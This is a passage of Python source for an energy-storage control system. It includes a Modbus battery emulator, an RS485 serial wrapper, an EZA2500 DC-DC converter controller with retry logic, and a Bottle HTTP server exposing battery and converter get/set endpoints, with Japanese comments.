bosは 融通不可: 0, 充電のみ許可: 1, 放電のみ許可: 2, 融通許可: 3
cmmerrは 通信エラーが発生したか(True)否か(False)
0と3しか返さない。
"""
rsoc = 0
bos = 0
comm_err1 = -1
comm_err2 = -1
retry = 2
while retry > 0:
try:
self.remote_rsoc()
rsoc = self.read_rsoc()
comm_err1 = 0
break
except pymodbus.exceptions.ModbusIOException:
time.sleep(0.5)
retry = retry - 1
rsoc = 0
retry = 2
while retry > 0:
try:
self.remote_status()
bos = 0 if self.read_status() == 0 else 3
comm_err2 = 0
break
except pymodbus.exceptions.ModbusIOException:
time.sleep(0.5)
retry = retry - 1
bos = 0
if comm_err1 == 0 and comm_err2 == 0:
comm_err = 0
else:
comm_err = -1
return (rsoc, bos, comm_err)
#単体テストをするにはPYTHONPATHに一つ上のディレクトリを指定すること
if __name__ == "__main__":
from pymodbus.client.sync import ModbusSerialClient as ModbusClient
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--device', default = "/dev/ttyO4")
parser.add_argument('--speed', default = 9600, type = int)
parser.add_argument('--unit', default = 1, type = int)
args = parser.parse_args()
print("device={}".format(args.device))
print("speed={}".format(args.speed))
print("unit={}".format(args.unit))
client = ModbusClient(method='rtu', port=args.device, timeout=1, baudrate=args.speed)
client.connect()
emubat = BatteryEmulator(dev = client, modbus_adr_rsoc = 0x1d, modbus_adr_status = 0x1e, unit = args.unit)
emubat.remote_rsoc()
mes = emubat.read_rsoc()
if mes != None:
print("rsoc={}".format(mes))
time.sleep(0.1)
emubat.remote_status()
mes = emubat.read_status()
if mes != None:
print("status={}".format(mes))
time.sleep(0.1)
print(emubat.check_battery())
```
#### File: drivers/essx/essx_global.py
```python
class ESSXGlobal:
saved_params = {
0: {}
}
@classmethod
def has(cls, unit, key):
if not unit in cls.saved_params:
return False
return key in cls.saved_params[unit]
@classmethod
def put(cls, unit, key, value):
if not unit in cls.saved_params:
cls.saved_params[unit] = {}
cls.saved_params[unit][key] = value
@classmethod
def get(cls, unit, key):
if not unit in cls.saved_params:
return False
return cls.saved_params[unit][key]
@classmethod
def reset(cls, unit):
cls.saved_params = {
unit: {}
}
```
#### File: drivers/essx/essx_rs485.py
```python
import sys
import serial
import serial.rs485
#import time
import binascii
import copy
try:
import Adafruit_BBIO.GPIO as GPIO
except:
print("This IoT board isn't BBB.")
class ESSXRS485(serial.Serial):
def __init__(self, *args, **kwargs):
if 'dir_pin' in kwargs:
self.dir_pin = kwargs['dir_pin']
kwargs = copy.copy(kwargs)
del kwargs['dir_pin']
else:
self.dir_pin = "P8_9"
print("dir_pin: {}".format(self.dir_pin))
super(ESSXRS485, self).__init__(*args, **kwargs)
if self.dir_pin != "not_used":
GPIO.setup(self.dir_pin, GPIO.OUT)
GPIO.output(self.dir_pin, GPIO.LOW)
self.reset_input_buffer()
# def read(self, size = 1):
# GPIO.output(self.dir_pin, GPIO.LOW)
# res = super(ESSXRS485, self).read(size)
# if res != None:
# print("READ LEN={}".format(len(res)))
# print("READ LEN={}".format(binascii.hexlify(res)))
# else:
# print("READ TIMEOUT")
#
# return res
def write(self, b):
if self.dir_pin != "not_used":
GPIO.output(self.dir_pin, GPIO.HIGH)
_len = super(ESSXRS485, self).write(b)
self.flush()
self.reset_input_buffer()
if self.dir_pin != "not_used":
GPIO.output(self.dir_pin, GPIO.LOW)
return _len
if __name__ == "__main__":
import sys
import argparse
import binascii
parser = argparse.ArgumentParser()
parser.add_argument('--device', default = "/dev/ttyO2")
parser.add_argument('--speed', default = "9600")
parser.add_argument('command', choices = ['send', 'recv', 'sendrecv'])
args = parser.parse_args()
if args.device == "/dev/ttyO2": #for BBB
a = ESSXRS485(args.device, int(args.speed), dir_pin = 'P8_7')
elif args.device == "/dev/ttyO4": #for BBB
a = ESSXRS485(args.device, int(args.speed), dir_pin = 'P8_7')
elif args.device == "/dev/ttyO5": #for BBB
a = ESSXRS485(args.device, int(args.speed), dir_pin = 'P8_9')
if args.command == 'recv':
print("waiting..")
print(a.read(8))
elif args.command == 'send':
data = b"ABCDEFGH"
print("sending " + str(len(b"ABCDEFGH")) + " bytes data")
a.write(data)
elif args.command == 'sendrecv':
data = b"ABCDEFGH"
print("sending " + str(len(b"ABCDEFGH")) + " bytes data")
a.write(data)
print("waiting..")
print(binascii.hexlify(a.read(8)))
while True:
print(binascii.hexlify(a.read(1)))
```
#### File: drivers/essx/essx_type_oes.py
```python
import time
from essx.essx_exception import ESSXTimeoutException, ESSXValueException, ESSXChecksumException, ESSXDeviceException
import eza2500
from essx import essx_util
import threading
from essx import essx_debug
class ESSXTypeOES:
"""
Rest APIとデバイスのやりとりをするコントローラクラス
"""
def __init__(self, dcdc_dev = None, bat_dev = None, dcdc_config = None, bat_config = None, ad1 = 0, ad2 = 1, name = None):
self.dcdc_config = dcdc_config
self.bat_config = bat_config
self.dcdc_dev = dcdc_dev
self.bat_dev = bat_dev
self.ad1 = ad1
self.ad2 = ad2
self.name = name
self.com0101 = eza2500.Command0101(self.dcdc_dev)
self.com0201 = eza2500.Command0201(self.dcdc_dev)
self.com0301 = eza2500.Command0301(self.dcdc_dev)
self.com0304 = eza2500.Command0304(self.dcdc_dev)
self.com0401 = eza2500.Command0401(self.dcdc_dev)
self.com0601 = eza2500.Command0601(self.dcdc_dev)
self.com0701 = eza2500.Command0701(self.dcdc_dev)
self.com0901 = eza2500.Command0901(self.dcdc_dev)
self.com1001 = eza2500.Command1001(self.dcdc_dev)
self.com0104 = eza2500.Command0104(self.dcdc_dev)
self.com0404 = eza2500.Command0404(self.dcdc_dev)
self.com0604 = eza2500.Command0604(self.dcdc_dev)
self.com0704 = eza2500.Command0704(self.dcdc_dev)
self.com0904 = eza2500.Command0904(self.dcdc_dev)
self.battery_watchdog_running = True
self.battery_watchdog_thread = threading.Thread(target = self._battery_watchdog)
self.battery_watchdog_thread.daemon = True
self.battery_watchdog_thread.start()
def vrfy(self, obj, params = {}):
"""
コマンドのパラメータが正しいかどうかを確認する。
"""
obj.pack_senddata(self.ad1, self.ad2, params)
def run(self, obj, params = {}):
"""
コマンドを送って/受信をする。
エラーが発生したらリトライをする。
リトライ回数はEssCommConfigで設定する
"""
if 'number_of_dcdc_error_retry' in self.dcdc_config:
retry = int(self.dcdc_config['number_of_dcdc_error_retry'])
else:
retry = 0
if 'number_of_timeout_retry' in self.dcdc_config:
timeout_retry = int(self.dcdc_config['number_of_timeout_retry'])
else:
timeout_retry = 0
if 'wait_retry' in self.dcdc_config:
wait_retry = int(self.dcdc_config['wait_retry'])
else:
wait_retry = 0.1
retry += 1
timeout_retry += 1
while retry > 0 and timeout_retry > 0:
try:
obj.send(self.ad1, self.ad2, params)
obj.recv()
time.sleep(0.062)
return
except ESSXTimeoutException as err:
print("timeout retry: " + str(timeout_retry))
timeout_retry = timeout_retry - 1
if timeout_retry == 0:
raise
time.sleep(wait_retry)
except ESSXValueException as err:
print("value exception retry: " + str(retry))
retry = retry - 1
if retry == 0:
raise
time.sleep(wait_retry)
except ESSXChecksumException as err:
print("checksum exception retry: " + str(retry))
retry = retry - 1
if retry == 0:
raise
time.sleep(wait_retry)
except ESSXDeviceException as err:
_ercd = obj.response['ercd']
if _ercd == 0xffff: #受信したコマンドをサポートしていない
raise
elif _ercd == 0xfffe: #コマンドのパラメータが不正
raise
elif _ercd == 0xfffd: #正常だが受付不能
pass
elif _ercd == 0xfffc: #システムビジー
pass
elif _ercd == 0xfffb: #内部通信異常
raise
retry = retry - 1
if retry == 0:
raise ESSXTimeoutException('timeout')
time.sleep(wait_retry)
#ここには到達しないはずだが保険
raise ESSXTimeoutException('timeout')
def _check_battery(self):
if self.bat_dev == None:
return (0, 0, -1)
else:
return self.bat_dev.check_battery()
# rsoc = 0
# bos = 0
# comm_err1 = -1
# comm_err2 = -1
#
# retry = 2
# while retry > 0 and self.bat_dev != None:
# mes = self.bat_dev.read_rsoc()
# #一分内のデータか?(この値が適切かは考慮するところ)
# if mes != None and mes.timestamp > time.time() - 60:
# rsoc = (mes.data[2] + mes.data[3] * 256) / 10.0
# comm_err1 = 0
# break
# else:
# self.bat_dev.remote_rsoc()
# time.sleep(0.5)
# retry = retry - 1
# rsoc = 0
#
# retry = 2
# while retry > 0 and self.bat_dev != None:
# mes = self.bat_dev.read_status()
# #一分内のデータか?(この値が適切かは考慮するところ)
# if mes != None and mes.timestamp > time.time() - 60:
# if mes.data[0] == 1:
# bos = 3
# else:
# bos = 0
# comm_err2 = 0
# break
# else:
# self.bat_dev.remote_status()
# time.sleep(0.5)
# retry = retry - 1
# bos = 0
#
# if comm_err1 == 0 and comm_err2 == 0:
# comm_err = 0
# else:
# comm_err = -1
# return (rsoc, bos, comm_err)
def _battery_watchdog(self):
"""
10秒に一回バッテリの融通チェックをする
"""
essx_debug.log("watchdog start")
while self.battery_watchdog_running:
if self.bat_config == None:
time.sleep(10)
continue
essx_debug.log("watchdog")
essx_debug.log(self.bat_config['config'])
if 'force_dcdc_waiting' in self.bat_config['config'] and self.bat_config['config']['force_dcdc_waiting'] == True:
(rsoc, bos, comm_err) = self._check_battery()
essx_debug.log("rsoc " +str(rsoc))
essx_debug.log("bos " +str(bos))
if bos == 0:
essx_debug.log("->waiting")
self.run(self.com0104, {
'mode': self.checkOperationMode_2500(0)
})
time.sleep(10)
essx_debug.log("watchdog stop")
# /1/log/data
def log_data(self, params):
_dcdc_conf = self.dcdc_config['config']
_bat_conf = self.bat_config['config']
(rsoc, bos, comm_err) = self._check_battery()
if comm_err == -1:
raise ESSXDeviceException('comm error')
# if bos == 0:
# if 'force_dcdc_waiting' in self.bat_config['config'] and self.bat_config['config']['force_dcdc_waiting'] == True:
# self.run(self.com0104, {
# 'mode': self.checkOperationMode_2500(0)
# })
return {
"system_time": {
"year": 0,
"month": 0,
"day": 0,
"hour": 0,
"minute": 0
},
"rsoc": float(rsoc),
"dischargeable_time": {
"hour": 0,
"minute": 0
},
"battery_voltage": _bat_conf['battery_voltage'],
"battery_current": _bat_conf['battery_current'],
"battery_rsoc" : float(rsoc),
"battery_status": 0,
"battery_warning": 0,
#"battery_alarm": 0
"battery_operation_status": bos,
"battery_comm_err": comm_err,
"charge_discharge_power": _bat_conf['battery_voltage'] * _bat_conf['battery_current'],
"ups_operation_schedule": 0,
"ups_operation_mode": {
"mode": 0,
"parameter": 0,
"stop_mode": 0
},
#"ups_input_voltage": res["ac_input_voltage"],
#"ups_output_voltage": res["ac_output_voltage"],
#"ups_output_current": res["ac_output_current_r"] + res["ac_output_current_s"],
#"ups_output_frequency": res["ac_output_frequency"],
#"ups_output_power": res["ac_output_power"],
#"pvc_charge_voltage": res["pvc_charge_voltage"],
#"pvc_charge_current": res["pvc_charge_current"],
#"pvc_charge_power": res["pvc_charge_power"],
#"pvc_alarm": res["pvc_alarm"],
#"ups_alarm": res["inverter_alarm"]
}
def remote_ioctl_set(self, params):
_conf = self.dcdc_config['config']
# EZA2500は 6-4で DIG, CIBを指定する必要がある。CIBは設定より得られるが
# DIGは設定より得られないので、6-1で今の値を取得する
self.run(self.com0601)
self.run(self.com0604, {
'ubv': _conf['ubv'],
'ugv': _conf['ugv'],
'obv': _conf['obv'],
'ogv': _conf['ogv'],
'cib': _conf['cib'],
'dig': self.com0601.response['dig']
})
self.run(self.com0704, {
'bcf': essx_util.strToNum(_conf['bcf']),
'cvb': _conf['cvb'], #tvb => cvb
'dlb': _conf['dlb'], #lbv => dlb
'cdb': _conf['cdb'], #cud => cdb
'ddb': _conf['ddb'], #dld => ddb
})
self.run(self.com0304, {
'cvb': _conf['cvb'],
'drb': _conf['drb'],
})
res = {}
res["dcdc_converter_name"] = self.name
#設定の戻値ではなく設定した値そのものを返す
res["dcdc_setup_parameter"] = {
"ubv": _conf['ubv'],
"ugv": _conf['ugv'],
"obv": _conf['obv'],
"ogv": _conf['ogv'],
"bcf": "0x" + ("%04x" % _conf['bcf']),
"cvb": _conf['cvb'],
"dlb": _conf['dlb'],
"cdb": _conf['cdb'],
"ddb": _conf['ddb'],
"drb": _conf['drb'],
"cib": _conf['cib'],
#"lbd": _conf['lbd']
}
return res
def remote_ioctl_get(self, params):
_res_log_data = self.log_data(params)
_res_remote_get = self.remote_get(params)
return {
"status": _res_remote_get["status"],
"powermeter": _res_remote_get["powermeter"],
"meter": _res_remote_get["meter"],
"vdis": _res_remote_get["vdis"],
"param": _res_remote_get["param"],
"system_time": _res_log_data["system_time"],
"rsoc": _res_log_data["rsoc"],
"dischargeable_time": _res_log_data["dischargeable_time"],
"battery_voltage": _res_log_data["battery_voltage"],
"battery_current": _res_log_data["battery_current"],
"battery_rsoc" : _res_log_data["battery_rsoc"],
"battery_status": _res_log_data["battery_status"],
"battery_warning": _res_log_data["battery_warning"],
#"battery_alarm": 0
"battery_operation_status": _res_log_data["battery_operation_status"],
"battery_comm_err": _res_log_data["battery_comm_err"],
"charge_discharge_power": _res_log_data["charge_discharge_power"],
"ups_operation_schedule": _res_log_data["ups_operation_schedule"],
"ups_operation_mode": _res_log_data["ups_operation_mode"],
#"ups_input_voltage": res["ac_input_voltage"],
#"ups_output_voltage": res["ac_output_voltage"],
#"ups_output_current": res["ac_output_current_r"] + res["ac_output_current_s"],
#"ups_output_frequency": res["ac_output_frequency"],
#"ups_output_power": res["ac_output_power"],
#"pvc_charge_voltage": res["pvc_charge_voltage"],
#"pvc_charge_current": res["pvc_charge_current"],
#"pvc_charge_power": res["pvc_charge_power"],
#"pvc_alarm": res["pvc_alarm"],
#"ups_alarm": res["inverter_alarm"]
}
def remote_get(self, params):
_conf = self.dcdc_config['config']
self.run(self.com0101, {})
self.run(self.com0201, {})
self.run(self.com0401, {})
self.run(self.com0901, {})
self.run(self.com1001, {})
self.run(self.com0601, {})
res = {}
res["operationMode"] = self.com0101.response['mode']
res["alarmState"] = (self.com0201.response['cst'] & 0xc) >> 2
res["alarm"] = (self.com0901.response['alm1'])
res["status"] = (self.com0201.response['cst'] & 0x3)
res["wg"] = round(self.com1001.response['wg'], 16)
res["tmp"] = round(self.com1001.response['tmp'],16)
res["vb"] = round(self.com1001.response['vb'], 16)
res["wb"] = round(self.com1001.response['wb'], 16)
res["vg"] = round(self.com1001.response['vg'], 16)
res["ib"] = round(self.com1001.response['ib'], 16)
res["ig"] = round(self.com1001.response['ig'], 16)
res["dvg"] = round(self.com0401.response['dvg'], 16) #tgv => dvg
res["drg"] = round(self.com0401.response['drg'], 16)
res["dig"] = round(self.com0601.response['dig'], 16) #lgc, lgd => dig
return {
"status": {
"status": "0x" + ('%04x' % res["operationMode"]),
"alarmState": essx_util.alarmStateStr(res["alarmState"]),
"statusName": "Ignore",
"alarm": essx_util.alarmStr(res["status"], res["alarmState"], res["alarm"]),
"runningState": essx_util.runningStateStr(res['status']),
"operationMode": essx_util.operationModeStr(res["operationMode"]),
},
"powermeter": {
"p2": 0,
"p1": 0,
"v1": 0,
"kwh2": 0,
"kwh1": 0,
"i1": 0
},
"meter": {
"wg": res["wg"],
"tmp": res["tmp"],
"vb": res["vb"],
"wb": res["wb"],
"vg": res["vg"],
"ib": res["ib"],
"ig": res["ig"]
},
"vdis": {
"dvg": res["dvg"],
"drg": res["drg"]
},
"param": {
'cib': _conf['cib'],
'ubv': _conf['ubv'],
"dig": res["dig"],
'ogv': _conf['ogv'],
'obv': _conf['obv'],
'ugv': _conf['ugv'],
}
}
def remote_get_status(self, params):
self.run(self.com0101)
self.run(self.com0201)
self.run(self.com1001)
res = {}
res["operationMode"] = self.com0101.response['mode']
res["alarmState"] = (self.com0201.response['cst'] & 0xc) >> 2
res["status"] = (self.com0201.response['cst'] & 0x3)
res["wg"] = round(self.com1001.response['wg'], 16)
res["tmp"] = round(self.com1001.response['tmp'], 16)
res["vb"] = round(self.com1001.response['vb'], 16)
res["wb"] = round(self.com1001.response['wb'], 16)
res["vg"] = round(self.com1001.response['vg'], 16)
res["ib"] = round(self.com1001.response['ib'], 16)
res["ig"] = round(self.com1001.response['ig'], 16)
return {
"status": {
"alarmState": essx_util.alarmStateStr(res["alarmState"]),
"runningState": essx_util.runningStateStr(res['status']),
"operationMode": essx_util.operationModeStr(res["operationMode"]),
},
"meter": {
"wg": res["wg"],
"tmp": res["tmp"],
"vb": res["vb"],
"wb": res["wb"],
"vg": res["vg"],
"ib": res["ib"],
"ig": res["ig"]
},
}
def remote_set(self, params):
"""
以下のパラメータが必要である
params['mode']
params['dvg']
params['drg']
params['dig']
'mode'は16進数の文字列(EZA2500値)で指定する。
読み変えはしない
"""
_conf = self.dcdc_config['config']
_local_current_mode = params['current_mode'] ##############Added for v1.3 2018/11/14##################
self.vrfy(self.com0404, {
'dvg': params['dvg'], 'drg': params['drg']
})
self.vrfy(self.com0604, {
'ubv': _conf['ubv'],
'ugv': _conf['ugv'],
'obv': _conf['obv'],
'ogv': _conf['ogv'],
'cib': _conf['cib'],
'dig': params['dig'],
})
self.vrfy(self.com0104, {
'mode': self.checkOperationMode_2500(essx_util.hexStrToInt(params['mode']))
})
#############Added for v1.3 2018/11/14 現在のModeによってコマンドの発行順を変える。###################
##########################################↓↓↓#########################################################
if _local_current_mode == '0x0000':
self.run(self.com0404, {
'dvg': params['dvg'], 'drg': params['drg']
})
self.run(self.com0604, {
'ubv': _conf['ubv'],
'ugv': _conf['ugv'],
'obv': _conf['obv'],
'ogv': _conf['ogv'],
'cib': _conf['cib'],
'dig': params['dig'],
})
self.run(self.com0104, {
'mode': self.checkOperationMode_2500(essx_util.hexStrToInt(params['mode']))
})
else:
self.run(self.com0104, {
'mode': self.checkOperationMode_2500(essx_util.hexStrToInt(params['mode']))
})
self.run(self.com0404, {
'dvg': params['dvg'], 'drg': params['drg']
})
self.run(self.com0604, {
'ubv': _conf['ubv'],
'ugv': _conf['ugv'],
'obv': _conf['obv'],
'ogv': _conf['ogv'],
'cib': _conf['cib'],
'dig': params['dig'],
})
##########################################↑↑↑######################################################
###################################################################################################
self.run(self.com0201)
self.run(self.com0901)
self.run(self.com1001)
res = {}
res["operationMode"] = self.com0104.response['mode']
res["alarmState"] = (self.com0201.response['cst'] & 0xc) >> 2
res["alarm"] = (self.com0901.response['alm1'])
res["status"] = (self.com0201.response['cst'] & 0x3)
res["wg"] = round(self.com1001.response['wg'], 16)
res["tmp"] = round(self.com1001.response['tmp'], 16)
res["vb"] = round(self.com1001.response['vb'], 16)
res["wb"] = round(self.com1001.response['wb'], 16)
res["vg"] = round(self.com1001.response['vg'], 16)
res["ib"] = round(self.com1001.response['ib'], 16)
res["ig"] = round(self.com1001.response['ig'], 16)
res["dvg"] = round(self.com0404.response['dvg'], 16)
res["drg"] = round(self.com0404.response['drg'], 16)
res["dig"] = round(self.com0604.response['dig'], 16)
return {
"status": {
"status": "0x" + ('%04x' % res["operationMode"]),
"alarmState": essx_util.alarmStateStr(res["alarmState"]),
"statusName": "Ignore",
"alarm": essx_util.alarmStr(res["status"], res["alarmState"], res["alarm"]),
"runningState": essx_util.runningStateStr(res['status']),
"operationMode": essx_util.operationModeStr(res["operationMode"]),
},
"meter": {
"wg": res["wg"],
"tmp": res["tmp"],
"vb": res["vb"],
"wb": res["wb"],
"vg": res["vg"],
"ib": res["ib"],
"ig": res["ig"]
},
"vdis": {
"dvg": res["dvg"],
"drg": res["drg"]
},
"param": {
'cib': _conf['cib'],
'ubv': _conf['ubv'],
"dig": res["dig"],
'ogv': _conf['ogv'],
'obv': _conf['obv'],
'ugv': _conf['ugv'],
}
}
def remote_set_current(self, params):
"""
digが必須
mode, dvg, drg も上層より指定されてくるが必須ではない。
"""
_conf = self.dcdc_config['config']
self.vrfy(self.com0604, {
'ubv': _conf['ubv'],
'ugv': _conf['ugv'],
'obv': _conf['obv'],
'ogv': _conf['ogv'],
'cib': _conf['cib'],
'dig': params['dig'],
})
self.run(self.com0604, {
'ubv': _conf['ubv'],
'ugv': _conf['ugv'],
'obv': _conf['obv'],
'ogv': _conf['ogv'],
'cib': _conf['cib'],
'dig': params['dig'],
})
self.run(self.com1001)
res = {}
res["wg"] = round(self.com1001.response['wg'], 16)
res["tmp"] = round(self.com1001.response['tmp'], 16)
res["vb"] = round(self.com1001.response['vb'], 16)
res["wb"] = round(self.com1001.response['wb'], 16)
res["vg"] = round(self.com1001.response['vg'], 16)
res["ib"] = round(self.com1001.response['ib'], 16)
res["ig"] = round(self.com1001.response['ig'], 16)
res["dig"] = round(self.com0604.response['dig'], 16)
return {
"meter": {
"wg": res["wg"],
"tmp": res["tmp"],
"vb": res["vb"],
"wb": res["wb"],
"vg": res["vg"],
"ib": res["ib"],
"ig": res["ig"]
},
"param": {
'cib': _conf['cib'],
'ubv': _conf['ubv'],
"dig": res["dig"],
'ogv': _conf['ogv'],
'obv': _conf['obv'],
'ugv': _conf['ugv'],
}
}
def remote_set_voltage(self, params):
"""
dvg, drg が必須
mode, digも上層より指定されてくるが必須ではない。
"""
self.vrfy(self.com0404, {
'dvg': params['dvg'], 'drg': params['drg']
})
self.run(self.com0404, {
'dvg': params['dvg'], 'drg': params['drg']
})
self.run(self.com1001)
res = {}
res["wg"] = round(self.com1001.response['wg'], 16)
res["tmp"] = round(self.com1001.response['tmp'], 16)
res["vb"] = round(self.com1001.response['vb'], 16)
res["wb"] = round(self.com1001.response['wb'], 16)
res["vg"] = round(self.com1001.response['vg'], 16)
res["ib"] = round(self.com1001.response['ib'], 16)
res["ig"] = round(self.com1001.response['ig'], 16)
res["dvg"] = round(self.com0404.response['dvg'], 16)
res["drg"] = round(self.com0404.response['drg'], 16)
return {
"meter": {
"wg": res["wg"],
"tmp": res["tmp"],
"vb": res["vb"],
"wb": res["wb"],
"vg": res["vg"],
"ib": res["ib"],
"ig": res["ig"]
},
"vdis": {
"dvg": res["dvg"],
"drg": res["drg"]
},
}
def remote_ioctl_clr_alarm(self, params):
self.run(self.com0904, {
'd0': 0, 'd1': 0,
})
return self.remote_get(params)
def checkOperationMode_2500(self, v):
"""
EZA2500のoperationModeの確認
"""
if v == 0x0:
return v
elif v == 0x2:
return v
elif v == 0x14:
return v
elif v == 0x41:
return v
raise ESSXValueException("bad value: operation mode: " + str(v))
if __name__ == "__main__":
#単体テストのためにはデバイスの先に装置(esscomm/ess2/test.py で代用可)が必要
import serial
import traceback
import essx
ser_dev = essx.essx_rs232c.ESSXRS232C("/dev/cuaU1", 19200)
dcdc_dev = eza2500.EZA2500Device(dev = ser_dev, timeout = 1)
controller = ESSXType3(dcdc_dev = dcdc_dev, bat_dev = None, dcdc_config = {
'config': {
'bcf': 0,
# 'lbc': 45.8, #バッテリ上限電流(充電)
# 'lbd': 45.8, #バッテリ上限電流(放電)
'ubv': 60, #バッテリ低電圧閾値
'obv': 60, #バッテリ過電圧閾値
#'lgc': 34.4, #グリッド上限電流(充電)
#'lgd': 34.4, #グリッド上限電流(放電)
'ugv': 280, #グリッド低電圧閾値
'ogv': 280, #グリッド過電圧閾値
#'tgv': 240, #グリッド目標電圧
'cvb': 40, #バッテリ目標電圧
'dlb': 40, #バッテリ放電終止電圧
'cdb': 6, #バッテリ充電上限予告電圧偏差
'ddb': 6, #バッテリ充電終止予告電圧偏差
#'drg': 0.25, #グリッドドループ率
'drb': 0.25, #バッテリドループ率
'cib': 45.8,
}}, bat_config = {
'config': {
'battery_voltage': 200,
'battery_current': 2.0
}}
)
try:
print("/1/log/data")
print(controller.log_data({}))
print("remote/ioctl/get")
print(controller.remote_ioctl_get({}))
print("remote/ioctl/set")
print(controller.remote_ioctl_set({}))
print(controller.remote_get({}))
print(controller.remote_get_status({}))
print(controller.remote_set({'mode': '0x02', 'dvg': 300, 'drg': 0.1, 'dig': 0}))
print(controller.remote_set_current({'dig': 3}))
print(controller.remote_set_voltage({'dvg': 360, 'drg': 0.2}))
print(controller.remote_ioctl_clr_alarm({}))
except ESSXValueException as err:
print(err.reason)
print(traceback.format_exc())
raise err
```
#### File: apis-dcdc_batt_comm/drivers/essx_server.py
```python
import sys
import os
import bottle
from bottle import route, HTTPResponse
import argparse
import serial
import essx
from essx.essx_exception import ESSXException, ESSXConfigException, ESSXParameterException
from essx.essx_modbus import ESSXModbusClient
from essx.essx_rs485 import ESSXRS485
import yaml
from decimal import Decimal
import datetime
import json
parser = argparse.ArgumentParser(description = 'ESS Server')
parser.add_argument('--host', default = "localhost")
parser.add_argument('--port', default = 8080, type = int)
parser.add_argument('--debug', action = 'store_true')
parser.add_argument('--goodbye', action = 'store_true')
parser.add_argument('--config', default = "dcdc_batt_comm.yml")
args = parser.parse_args()
if args.debug == True:
os.environ['ESSX_LOG_LEVEL'] = '7'
class ESSXConfig(object):
"""
設定ファイルを管理するクラス。このクラスはSingletonである。
"""
_instance = None
def __new__(cls, config_file, *args, **kwargs):
if not cls._instance:
cls._instance = super(ESSXConfig, cls).__new__(cls, *args, **kwargs)
return cls._instance
def __init__(self, config_file, *args, **kwargs):
super(ESSXConfig, self).__init__(*args, **kwargs)
self.config_file = config_file
self.reload()
def reload(self):
f = open(self.config_file)
self._config = yaml.safe_load(f)
f.close()
def config(self):
return self._config
def __getitem__(self, i):
return self._config[i]
def init_controller(dcdc_unit = 0, battery_unit = 0):
"""
controllerを設定ファイルに従って初期化して得る。
@param dcdc_unit DCDC unit number
@param battery_unit Battery unit number
"""
ess_system_config = app_config['ess_system']
if ess_system_config['type'] == 'essx_type_oes':
import essx.essx_type_oes
import eza2500
import battery_emulator
dcdc_config = ess_system_config['dcdc_dev'][dcdc_unit]
bat_config = ess_system_config['battery_dev'][battery_unit]
if dcdc_config['class'] == 'ESSXRS485':
dcdc_dev_params = dcdc_config['params']
dcdc_dev_kwparams = dcdc_config['kwparams']
ser_dev = essx.essx_rs485.ESSXRS485(*dcdc_dev_params, **dcdc_dev_kwparams)
dcdc_dev = eza2500.EZA2500Device(dev = ser_dev, timeout = 0.1)
else:
raise ESSXConfigException('dcdc_config')
if bat_config['class'] == 'ESSXModbus':
bat_dev_params = bat_config.get('params', [])
if 'kwparams' in bat_config:
bat_dev_kwparams = bat_config['kwparams']
else:
bat_dev_kwparams = {}
dev = essx.essx_modbus.ESSXModbusClient(*bat_dev_params, **bat_dev_kwparams)
bat_dev = battery_emulator.BatteryEmulator(dev = dev, modbus_adr_rsoc = bat_config['modbus_adr_rsoc'] - 30001, modbus_adr_status = bat_config['modbus_adr_status'] - 30001, unit = bat_config['unit'])
elif bat_config['class'] == 'None':
bat_dev = None
else:
raise ESSXConfigException('bat_config')
dcdc_config_name = dcdc_config['config']
bat_config_name = bat_config['config']
controller = essx.essx_type_oes.ESSXTypeOES(
dcdc_dev = dcdc_dev,
bat_dev = bat_dev,
dcdc_config = app_config['dcdc'][dcdc_config_name],
bat_config = app_config['battery'][bat_config_name],
ad1 = int(dcdc_config['address1']),
ad2 = int(dcdc_config['address2']),
name = dcdc_config['name'],
)
else:
print("unknown controller: " + ess_system_config['type'])
sys.exit(0)
return controller
def essx_exception_handler(func):
""" essx_exceptionが発生したときの例外デコレーター """
import functools
@functools.wraps(func)
def wrapper(*args, **kwargs):
try:
res = func(*args, **kwargs)
return res
except ESSXException as err:
body = {'err': err.reason}
res = HTTPResponse(status=400, body=body)
res.set_header('Content-Type', 'application/json')
return res
except Exception as err:
body = {'err': str(err)}
res = HTTPResponse(status=400, body=body)
res.set_header('Content-Type', 'application/json')
return res
return wrapper
@route('/essx/hello')
@essx_exception_handler
def hello():
""" デバッグ用 """
body = {'message': 'hello world'}
r = HTTPResponse(status=200, body=body)
r.set_header('Content-Type', 'application/json')
essx.ESSXGlobal.reset(0)
return r
@route('/essx/goodbye')
@essx_exception_handler
def goodbye():
""" デバッグ用 """
if args.goodbye:
body = {'message': 'goodbye'}
r = HTTPResponse(status=200, body=body)
r.set_header('Content-Type', 'application/json')
essx.ESSXGlobal.reset(0)
print("GOODBYE!")
os._exit(0)
@route('/battery/get')
@route('/1/log/data')
@essx_exception_handler
def cmd_get_1_log_data():
res = controller.log_data({})
if bottle.request.fullpath == '/battery/get':
res = {'rsoc': res['rsoc'], 'battery_operation_status': res['battery_operation_status']}
r = HTTPResponse(status=200, body = res)
r.set_header('Content-Type', 'application/json')
return r
@route('/dcdc/get')
@route('/remote/get')
@essx_exception_handler
def cmd_get_remote_get():
res = controller.remote_get({})
if bottle.request.fullpath == '/dcdc/get':
del res['powermeter']
r = HTTPResponse(status=200, body = res)
r.set_header('Content-Type', 'application/json')
return r
@route('/dcdc/get/status')
@route('/remote/get/status')
@essx_exception_handler
def cmd_get_remote_get_status():
res = controller.remote_get_status({})
r = HTTPResponse(status=200, body = res)
r.set_header('Content-Type', 'application/json')
return r
_global_current_mode = '0x0000' #############Added for v1.3 2018/11/14##########################
@route('/dcdc/set')
@route('/remote/set')
@essx_exception_handler
def cmd_get_remote_set():
# mode, dvg, dig がパラメータとして必須
# 省略された場合は cache値から取得。
# drgの指定がない場合はcache値を取得。キャッシュもない場合は0となる
params = {}
req_params = bottle.request.params
if bottle.request.fullpath == '/dcdc/set':
# v1.2で /remote/set, /remote/voltage, /remote/currentと同等のAPI
# /dcdc/setが追加されたが、この3種のAPIは返すJSONデータが微妙に違うので
# /dcdc/setで digだけのときは /remote/set/currentとみなし、
# /dcdc/setで dvgだけ、または dvg、drgが設定されているだけのときは /remote/set/voltageとみなす
# コードを入れる
if 'dig' in req_params and not 'dvg' in req_params and not 'drg' in req_params and not 'mode' in req_params:
return cmd_remote_set_current()
if not 'dig' in req_params and 'dvg' in req_params and not 'mode' in req_params:
return cmd_remote_set_voltage()
if 'mode' in req_params:
params['mode'] = req_params['mode']
elif essx.ESSXGlobal.has(0, 'mode'):
params['mode'] = essx.ESSXGlobal.get(0, 'mode')
else:
raise ESSXParameterException("No operationMode")
if 'dig' in req_params:
params['dig'] = req_params['dig']
elif essx.ESSXGlobal.has(0, 'dig'):
